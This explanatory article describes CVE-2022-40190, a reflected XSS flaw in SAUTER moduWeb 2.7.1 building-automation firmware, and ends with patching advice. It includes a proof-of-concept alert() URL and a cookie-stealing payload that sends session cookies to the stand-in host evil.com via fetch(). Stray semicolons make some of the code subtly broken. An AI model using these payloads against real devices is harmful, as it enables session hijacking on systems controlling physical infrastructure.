CVE-2022-40190 - Breaking Down the SAUTER Controls moduWeb 2.7.1 Reflected XSS Vulnerability

If you’re dealing with building automation, SAUTER’s Controls moduWeb devices are hard to miss. These handy web interfaces manage all kinds of smart building tech, letting admins keep an eye on environmental controls right from a browser. But with CVE-2022-40190, these conveniences come with a price—your credentials (and data) are at risk, thanks to a reflective cross-site scripting (XSS) bug in firmware version 2.7.1.

In this article, we’ll explain what CVE-2022-40190 is, walk through *exactly* how the vulnerability works, show you a simple exploit, and give links to everything you need to know.

What is CVE-2022-40190?

CVE-2022-40190 is a security flaw in SAUTER Controls moduWeb firmware version 2.7.1. To put it simply, the web app doesn’t clean up what users type into it. That means if an attacker enters JavaScript code into a web request, the server returns that code right back for the browser to execute.

This is called *reflected* or *non-persistent* XSS. It’s dangerous because an attacker can craft a link, send it to a victim, and—when the victim clicks—the browser runs the attacker's code. This could lead to:

Abuse of the victim’s permissions in the application

Original reference:  
- NIST NVD entry for CVE-2022-40190  
- ICS Advisory (ICSA-22-246-03) by CISA

How Does the Exploit Work?

The problem: the moduWeb server receives a *request string* (such as a URL parameter), puts it straight into an HTML page, and returns it to the user. If you put JavaScript in that string, it gets executed in the victim’s browser.

Let’s say there’s a page like this

http://moduweb.local/index.html?msg=welcome

If the web app simply places msg directly into the page, you can swap welcome for any JavaScript you want.

Example Exploit Link

http://moduweb.local/index.html?msg=<script>alert('XSS')</script>;

What happens?
When a user clicks this link, the page will display an alert pop-up: XSS. This proves the script ran in their browser.

Here’s some pseudocode similar to what the vulnerable server might be doing

# Simple pseudocode for rendering the message
def render_page(request):
    msg = request.GET['msg']
    page = f"""
    <html>
      <body>
        <p>{msg}</p> <!-- Vulnerable! -->
      </body>
    </html>
    """
    return page

There’s no filtering or encoding here. If msg contains a script, it will run in the user’s browser.

Real World Impact

If you control a building or critical system with SAUTER’s moduWeb, and an attacker sends you a crafted link (maybe in an email), clicking it could:

Change settings or cause harm using *your* permissions

And since the web management console sometimes controls physical systems, there’s more at stake than on a typical website!

A common attack would be to steal a session cookie using a payload like

<script>
  fetch('http://evil.com/steal?cookie='; + document.cookie)
</script>

An attacker could send this in a link

http://moduweb.local/index.html?msg=<script>fetch('http://evil.com/steal?cookie=';+document.cookie)</script>

Now, when the target admin visits the link, their browser quietly sends cookies (which might include session IDs) to “evil.com”. The attacker now uses those cookies to gain unauthorized access.

Official References & More Reading

- SAUTER Product Security Advisory Page
- CISA ICS Advisory ICSA-22-246-03
- NVD: CVE-2022-40190

Wrapping Up

CVE-2022-40190 shows how even specialized devices like building automation controllers can be left wide open to web-based attacks. A simple oversight—forgetting to clean up user input—can give attackers all the access they need.

If you’re a site admin or integrator using SAUTER moduWeb, get patched and look at ways to lock down web access. If you’re a pentester or security enthusiast, this is yet another example of how tiny bugs create huge risks in cyber-physical systems.

Timeline

Published on: 10/31/2022 21:15:00 UTC
Last modified on: 11/02/2022 14:13:00 UTC